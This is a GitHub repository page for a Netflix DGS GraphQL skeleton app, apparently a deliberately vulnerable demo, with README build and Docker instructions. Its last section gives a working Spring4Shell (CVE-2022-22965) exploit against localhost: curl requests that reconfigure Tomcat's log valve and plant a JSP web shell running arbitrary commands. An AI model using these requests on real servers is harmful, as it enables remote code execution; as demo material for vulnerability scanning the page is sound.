Skip to content

muldos/dgs-skeleton

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

140 Commits

.github/workflows

.github/workflows

 
 

docs

docs

 
 

src

src

 
 

.gitignore

.gitignore

 
 

Dockerfile

Dockerfile

 
 

DockerfileTomcat

DockerfileTomcat

 
 

README.md

README.md

 
 

fake-creds.txt

fake-creds.txt

 
 

pom-war.xml

pom-war.xml

 
 

pom.xml

pom.xml

 
 

tagspecs.json

tagspecs.json

 
 

Repository files navigation

DGS (from Netflix) skeleton project

github-dgs-build

Introduction

Run the project locally (outside docker): Set SHOWS_JSONDB_FOLDER env var (example : /Path/to/dgs-skeleton/src/main/resources/data) then run

mvn spring-boot:run

Build & run

Be sure that docker daemon is running.

Build as self executable JAR

export PKG_VERSION=1.2.3
export PKG_TYPE=jar
jf mvn -Drevision=$PKG_VERSION -Dmaven.test.skip=true clean package
docker build --build-arg JAR_FILE_NAME=dgs-skeleton-$PKG_VERSION.$PKG_TYPE -t dgs-graphql:latest .
docker run -p 8080:8080 -v ./src/main/resources/data:/var/db_data -d --name graphql-demo dgs-graphql:latest

Then browse to http://localhost:8080/graphiql

Build WAR for Tomcat

export PKG_VERSION=1.2.3
export PKG_TYPE=jar
export MVN_VIRTUAL_REPO=dro-backend-maven-virtual
jf mvnc --repo-resolve-releases=$MVN_VIRTUAL_REPO --repo-deploy-releases=$MVN_VIRTUAL_REPO --repo-resolve-snapshots=$MVN_VIRTUAL_REPO  --repo-deploy-snapshots=$MVN_VIRTUAL_REPO
jf mvn -Drevision=$PKG_VERSION -Dmaven.test.skip=true -f pom-war.xml clean package deploy
cp ./target/dgs-skeleton-webapp-$PKG_VERSION.$PKG_TYPE ./target/jfrog-demo.war
docker build --build-arg WAR_FILE_NAME=jfrog-demo.war -f DockerfileTomcat -t dgs-graphql-tomcat:latest .
docker run -p 8080:8080 -v $PWD/src/main/resources/data:/var/db_data -d --name graphql-demo dgs-graphql-tomcat:latest

Then browse to http://localhost:8080/jfrog-demo/graphiql

If this version is containing the vulnerabilty CVE-2022-22965, you can then exploit it as follow :

First run

curl -H "Accept: text/html;" "http://localhost:8080/jfrog-demo/vulnerable-path?class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7b%63%6f%64%65%7d%69&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=shell&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat="

To changes Tomcat config valve.

Then create the web shell

curl -H "Accept: text/html;" -H "code: <% java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter(String.valueOf(1337))).getInputStream(); int a = -1; byte[] b = new byte[2048]; while((a=in.read(b))!=-1) { out.println(new String(b)); } %>" "http://localhost:8080/jfrog-demo/vulnerable-path"

And run commands using

http://localhost:8080/shell.jsp?1337=ls%20-al

References

About

a netflix dgs application skeleton

Resources

Readme
Activity

Stars

1 star

Watchers

3 watching

Forks

7 forks
Report repository

Releases

No releases published

Packages

No packages published

Contributors 3

  •  
  •  
  •  

Languages